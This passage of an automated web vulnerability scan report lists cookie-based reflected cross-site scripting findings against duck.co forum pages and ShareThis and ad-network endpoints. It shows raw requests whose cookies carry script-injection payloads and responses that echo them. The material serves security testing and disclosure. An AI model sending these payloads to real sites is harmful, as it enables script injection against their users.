User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954373778"><script>alert(1)</script>c2bd925fe28;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=26AD49F519947CE6C94D1A0CCB01EBBB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:55 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954373778"><script>alert(1)</script>c2bd925fe28"/>
...[SNIP]...

3.293. http://duck.co/topic/post-your-ddg-sticker-photos [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/post-your-ddg-sticker-photos

Request

GET /topic/post-your-ddg-sticker-photos HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295437b023"><script>alert(1)</script>da8c442e844;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C2B747B0979BC078324DFFD5E1AAC931; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:12 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295437b023"><script>alert(1)</script>da8c442e844"/>
...[SNIP]...

3.294. http://duck.co/topic/post-your-ddg-sticker-photos [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/post-your-ddg-sticker-photos

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/post-your-ddg-sticker-photos HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954366b29"-alert(1)-"f9f23fce1df;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9A708A002D89726C63C80ACBC3D309F9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954366b29"-alert(1)-"f9f23fce1df";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.295. http://duck.co/topic/q-html-entities [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/q-html-entities

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/q-html-entities HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295432f2e0"-alert(1)-"5e7d5ebb0ca;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3D3B2AE7C88B41A328E650DC4C977EAA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:13 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc7295432f2e0"-alert(1)-"5e7d5ebb0ca";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.296. http://duck.co/topic/q-html-entities [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/q-html-entities

Request

GET /topic/q-html-entities HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295431326a"><script>alert(1)</script>7048306c3d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F399BE155F676731CA2B845494D3679B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:05 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295431326a"><script>alert(1)</script>7048306c3d"/>
...[SNIP]...

3.297. http://duck.co/topic/searching-for-roommates-on-craigslist [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/searching-for-roommates-on-craigslist

Request

GET /topic/searching-for-roommates-on-craigslist HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543b176f"><script>alert(1)</script>51962b447a;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=12B526F5F17A9C8BD578037612FCEB60; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:52 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543b176f"><script>alert(1)</script>51962b447a"/>
...[SNIP]...

3.298. http://duck.co/topic/searching-for-roommates-on-craigslist [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/searching-for-roommates-on-craigslist

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/searching-for-roommates-on-craigslist HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954370689"-alert(1)-"c15ca438802;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=944C7933E906949B82C1F4DC618BC42F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:02 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954370689"-alert(1)-"c15ca438802";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.299. http://duck.co/topic/spam-site-found [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/spam-site-found

Request

GET /topic/spam-site-found HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295432ee40"><script>alert(1)</script>552bfab57d2;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=34CA6ED96BB333EDD3E38352E179F864; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295432ee40"><script>alert(1)</script>552bfab57d2"/>
...[SNIP]...

3.300. http://duck.co/topic/spam-site-found [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/spam-site-found

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/spam-site-found HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295437c35c"-alert(1)-"33fe766ea2d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=1B559C4D18A0F18A6C89A90000BC5ED2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc7295437c35c"-alert(1)-"33fe766ea2d";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.301. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543e035f"-alert(1)-"7fcadb1c4f2;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=88776984B25F50258E14034ADC9D1724; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:06 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543e035f"-alert(1)-"7fcadb1c4f2";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.302. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest

Request

GET /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc7295437cd90"><script>alert(1)</script>be615a5bf61;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E58869C95499CE6AE8FD4DF9BD144626; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:52 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc7295437cd90"><script>alert(1)</script>be615a5bf61"/>
...[SNIP]...

3.303. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/want-more-visitors-ehh-needs-to-look-more-proffesional

Request

GET /topic/want-more-visitors-ehh-needs-to-look-more-proffesional HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543cc8e6"><script>alert(1)</script>a4c8349c4b5;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=31013D67B19716FC9CA18763DC491E92; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543cc8e6"><script>alert(1)</script>a4c8349c4b5"/>
...[SNIP]...

3.304. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/want-more-visitors-ehh-needs-to-look-more-proffesional

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/want-more-visitors-ehh-needs-to-look-more-proffesional HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543ee536"-alert(1)-"fa8817087cd;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D853372DB289FFA73D5C8717BC6C765C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:39 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543ee536"-alert(1)-"fa8817087cd";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.305. http://duck.co/topic/words-to-live-by [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/words-to-live-by

Request

GET /topic/words-to-live-by HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954367c29"><script>alert(1)</script>8f1e75e996a;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E13018A6B0A7BDF9562AA6C45D0185FB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:00 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc72954367c29"><script>alert(1)</script>8f1e75e996a"/>
...[SNIP]...

3.306. http://duck.co/topic/words-to-live-by [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/words-to-live-by

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/words-to-live-by HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc72954326d0d"-alert(1)-"a0bf8ae561d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=64787206BCBC7D6DBC5C2FECC15A4811; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc72954326d0d"-alert(1)-"a0bf8ae561d";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.307. http://duck.co/topic/wot-highlighting [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/wot-highlighting

Request

GET /topic/wot-highlighting HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543f8f35"><script>alert(1)</script>26088ff8cdc;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=621022488BECD1632D9CF7085061FCBE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:45:55 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<input type="hidden" name="zdrpn" value="0e3ab477-02f7-44ed-afa7-3623cc729543f8f35"><script>alert(1)</script>26088ff8cdc"/>
...[SNIP]...

3.308. http://duck.co/topic/wot-highlighting [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/wot-highlighting

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/wot-highlighting HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543a46f1"-alert(1)-"ec7fec44c60;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6D4F5A7DF3F8123FDA20CDF554BCA5E3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:46:06 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
duckduckgo";
var maxAttachmentsPerPost = "0";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "0e3ab477-02f7-44ed-afa7-3623cc729543a46f1"-alert(1)-"ec7fec44c60";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://duck.co";
var defaultDomain = "discussions.zoho.com";
var shouldRelo
...[SNIP]...

3.309. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Request

GET /getSegment.php?fpc=30dea60-12e64e877f0-4b740973-1&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==c13e0<script>alert(1)</script>edfc50278cb

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 27 Feb 2011 02:18:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1195


           <html>
           <head><title>ShareThis Segmenter</title></head>
           <body>
           
           No Segment
           <script type="text/javascript">
                   var ref=document.referrer;var lurl = (("https:" == document.location.p
...[SNIP]...
<div style='display:none'>clicookie:CszLBk1bK3ITLgrkJKQWAg==c13e0<script>alert(1)</script>edfc50278cb
userid:
</div>
...[SNIP]...

3.310. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://REDACTED
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://load.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMjc2IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBib3JkZXI9IjAiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vaWIuYWRueHMuY29tL3NlZz9hZGQ9ODUwMzQmZXhwaXJlX2RheXM9MjAmb3RoZXI9MTc3MDAxIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD00ZGUzMGE1MDBjOGM2YjhiZjljYmE3NTk5NTA1YjUyOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=c4ae08201e9f109b02be68e4efd9ed36
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; AA002=1297806090-110178561e5e4"><a>1e9fb9cf9c8; ach00=9cc2/1c4e; ach01=158f3cc/1c4e/2ac3a8d/9cc2/4d6263ca

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 275
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 27 Feb 2011 02:18:32 GMT

